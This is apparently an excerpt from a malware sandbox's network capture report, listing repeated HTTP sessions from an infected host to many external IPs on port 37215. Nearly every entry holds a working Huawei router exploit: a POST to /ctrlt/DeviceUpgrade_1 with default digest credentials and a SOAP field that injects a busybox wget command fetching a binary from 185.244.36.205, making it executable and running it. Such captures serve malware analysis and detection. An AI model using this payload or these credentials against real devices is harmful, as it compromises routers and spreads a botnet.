                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              870192.168.2.155356237.109.46.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538525105 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              871192.168.2.1537202197.44.235.24037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538531065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              872192.168.2.1549954102.6.27.24937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538552046 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              873192.168.2.155525494.42.107.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538570881 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              874192.168.2.1555966104.116.106.1137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538573027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              875192.168.2.1542518146.72.166.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538595915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              876192.168.2.1558610122.14.218.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538616896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              877192.168.2.1560062156.64.94.16337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538649082 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              878192.168.2.1560082121.168.72.1537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538669109 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              879192.168.2.153915837.135.222.24637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538681030 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
